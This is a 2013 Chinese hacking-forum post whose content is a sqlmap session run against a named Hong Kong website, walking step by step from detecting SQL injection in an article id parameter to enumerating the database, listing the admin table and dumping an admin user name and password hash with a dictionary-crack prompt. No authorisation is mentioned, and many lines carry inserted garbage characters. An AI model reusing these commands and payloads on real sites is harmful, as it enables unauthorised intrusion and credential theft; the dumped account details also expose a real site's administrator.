中国网络渗透测试联盟

标题: sqlmap实例注入mysql [打印本页]

---

作者: admin    时间: 2013-4-4 22:18
标题: sqlmap实例注入mysql
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-user       /*  注解：获取当前用户名称
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54
& f5 u: C  M5 f4 U4 {[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
8 }7 ]2 P1 g6 w: f/ A9 s( B session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
! {: \  `' B) ?  A! g[16:53:54] [INFO] testing connection to the target url
* a; s3 U+ H$ K- xsqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
7 Y/ r- r- b/ Q1 V: Z0 g, W---
, |" H# l1 c$ m4 HPlace: GET
  Q9 ?% v& f: s' ~! ]Parameter: id
, n# x9 K. @3 J0 q# F    Type: boolean-based blind
! H" e! J' h! u! F; K# x& g    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
. p+ K# z. C* V5 }7 l    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
9 Z. N+ p  c% G3 E! u( c& s& B8 s    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
$ g/ j+ N+ L% t    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
. f8 M$ P, U! |" P' N    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
, u. @! }$ }, g/ j' i8 ^2 ICHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
0 e4 q5 b( J2 r) c---
[16:53:55] [INFO] the back-end DBMS is MySQL
* i) X/ y+ e1 c% @( p$ Eweb server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'   
; M7 F; n1 `7 j# p+ P4 @: Y0 M[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
2 R' ^7 n+ B: P; xtput\www.wepost.com.hk'

shutting down at: 16:53:58
1 d; R- _! D8 w- m: H7 m  M' ]
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
9 E* ]& B8 V$ j2 J' Jms "Mysql" --current-db                  /*当前数据库
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16
& @. j& u: H: Z+ T[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
+ K8 p! K$ y* Y& P! o$ G2 r[16:54:16] [INFO] testing connection to the target url
5 C* A+ Q+ U2 b4 o4 L* p) p1 Ysqlmap identified the following injection points with a total of 0 HTTP(s) reque
( p3 o9 o' K1 V- \4 ists:
1 Z5 O9 y9 i9 I4 w3 r7 W---
Place: GET
3 @$ x1 R& r! l. J& [3 ^9 T  W7 kParameter: id
    Type: boolean-based blind
( \( }2 s7 q- s1 T7 C9 Z    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  y1 W" F1 s' Y/ m8 c6 y    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' }( [1 [9 F7 G5 v4 o0 ?% m, o) Z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
5 z$ }$ V! K$ ~8 A' Y0 y    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
9 |5 s: s7 j6 P9 `  p" k    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
7 l, {1 U- h! t8 c) T& Q    Payload: id=276 AND SLEEP(5)
4 j6 Z# r0 z8 e% B# _% r& P---
[16:54:17] [INFO] the back-end DBMS is MySQL
% ?: q& l$ e9 Eweb server operating system: Windows
! H5 Q/ D. n4 ]1 z" B4 ^# Wweb application technology: Apache 2.2.11, PHP 5.3.0
* o1 l9 l, ^! C( r" H4 _+ \back-end DBMS: MySQL 5.0
. d, u; f6 _+ D) D* ~' M6 U& S[16:54:17] [INFO] fetching current database
current database:    'wepost'
0 y) e7 d$ ?5 [; n$ f; k[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
1 V  J$ B4 ]3 e$ Xtput\www.wepost.com.hk'

shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
. b2 V  ~' R  {" tms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
8 i5 O$ O* g- x% K    http://sqlmap.sourceforge.net

starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
  Y0 x% q( B/ l+ U* t* m1 }/ z; j session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
' z) H1 C/ Z' P/ Zsqlmap identified the following injection points with a total of 0 HTTP(s) reque
  C* x- z4 R& psts:
+ V$ ?8 \7 Y; r0 X) K9 F# d( R---
Place: GET
Parameter: id
    Type: boolean-based blind
" N  N# [# s8 c& z9 A    Title: AND boolean-based blind - WHERE or HAVING clause
5 c% g! S4 U3 D" l2 }$ U    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
* ^" z* F) O* H* y' o120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
% U. S3 J" b5 \1 J6 ]8 S' M),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
; s- q( e" D5 y; g" G" k$ T4 ?& M    Type: UNION query
) N% J5 I. u9 L- S1 l/ Q    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 D0 U- Z" h  }" E  R$ b* u(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
% |* _* L! i1 q    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
! r( o; ?$ o; q. y2 k[16:55:26] [INFO] the back-end DBMS is MySQL
, A9 D3 \9 W; _1 a+ O! W6 Qweb server operating system: Windows
- W2 ^+ `5 f- I4 \" W4 V3 D' Jweb application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
9 R# h. p  H6 `' Z( w; r) e[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
. r: d, Q) L+ {& d+ B- U8 C9 c/ E% @[6 tables]
) l: u: `- c# t4 x+-------------+
| admin       |
) U7 C  [* q: `5 x, s) P| article     |
+ R! ^9 }8 o$ ^" f9 C6 ^| contributor |
| idea        |
| image       |
( ?7 X" y; X# n4 W8 z5 D| issue       |
* ?- `( V4 o! p1 c! [  L+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk'

shutting down at: 16:55:33

+ o" G+ J9 H0 a! n$ vD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# d: @6 M4 o( Oms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
: t6 @; V0 a& P; R; `/ S7 H    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
) B8 d6 V* h4 K! psts:
+ i9 w* E8 @9 J9 I6 {0 v6 u---
Place: GET
Parameter: id
    Type: boolean-based blind
, `) N& J1 Q/ a& c3 e& k9 V    Title: AND boolean-based blind - WHERE or HAVING clause
* k( A! i! H! b" A6 m    Payload: id=276 AND 799=799
( J0 d  x- I- t- c# Q% }    Type: error-based
7 H% B8 D6 I4 M* n    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
1 `0 [( l- _* [9 C. x; v/ I    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
. W5 z- g5 _- a4 w9 n2 ^),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
/ d1 G8 t4 ]3 D4 e$ E    Type: UNION query
  b7 H- a# F& |3 d  k; @6 Q    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
3 U4 _8 E$ \: c! S0 G4 y: J(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
9 e2 h9 Q2 O# YCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
+ X8 Q& @* i8 O, @    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
2 B; y/ R3 k, X, p; ~    Payload: id=276 AND SLEEP(5)
' ]! R/ n, S8 _: a---
1 J, ^) Z# f( J& Z4 yweb server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
: A' u( ^0 J! S1 c5 Yssion': wepost, wepost
Database: wepost
3 _4 F/ ~' A1 wTable: admin
  Y+ W  t: P6 x4 R& C* x[4 columns]
3 J# M5 [& G( N2 L+----------+-------------+
" v+ e1 ]' {- D4 T# z+ s| Column   | Type        |
+----------+-------------+
) _; M; S& L4 ]9 Q$ y3 W! c! I) R, r1 P| id       | int(11)     |
| password | varchar(32) |
2 Q6 Q5 N! d: l' k| type     | varchar(10) |
6 w: A0 J. X, f( U$ a; ?+ `8 Y* Z+ D| userid   | varchar(20) |
: T$ O& ]) R+ `, @1 F$ `9 w+ F+----------+-------------+
% K8 n* G8 d: m: L9 J

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    sqlmap/0.9 - automatic SQL injection and database takeover tool
& r. q* V2 L5 V: e6 ~0 d    http://sqlmap.sourceforge.net

starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
2 J! w- e6 c3 p0 u( D---
0 W7 f/ }9 C8 g2 X; E5 n% i. X/ UPlace: GET
Parameter: id
    Type: boolean-based blind
0 L8 T* y& `, u% F$ M+ R: D: t    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
; A/ F; P9 t, Y3 {+ m    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
& `9 u2 [2 n8 E; }4 x' o4 A    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# O( k8 R! K& c6 X( I    Type: UNION query
, z! B3 n& m4 L, e; O% u5 Y    Title: MySQL UNION query (NULL) - 1 to 10 columns
8 Y  X1 f! d% K8 y1 W! \! D    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 `- R5 f" p$ R( E(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
7 a7 E2 b+ x6 M% M    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
$ {4 p$ y8 S+ R& b. H5 K* l, ]    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack o
n retrieved table items? [Y/n/q] y
+ N1 Y$ R9 t' rwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
6 r: V7 Y# Q' g: L1 _do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
% n) u0 b6 n0 @, m& a6 dTable: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+ @& o( h8 {/ [9 P; X6 ^* ]& A2 X+----------------------------------+------------+
0 M+ \4 @3 h/ d) a

shutting down at: 16:58:14

D:\Python27\sqlmap>

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2